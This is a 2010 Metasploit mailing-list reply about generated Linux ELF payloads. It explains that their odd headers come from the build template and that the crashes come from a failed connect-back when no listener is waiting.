Metasploit mailing list archives

Re: Linux payloads broken

From: egypt () metasploit com
Date: Fri, 7 May 2010 12:06:53 -0600

The "corrupt" headers are an artifact of how we create ELF
executables.  If you want to see how that works look at
data/templates/src/elf/exe/elf_template.s

When I run an elf generated with the same command you posted under
strace, it clearly calls socket() and connect() before dying.  When a
listener is waiting to accept that connection, it works fine.  The
segfault you're seeing, as Ramon and Florian have pointed out, is due
to a failed connect.

Hope this helped,
egypt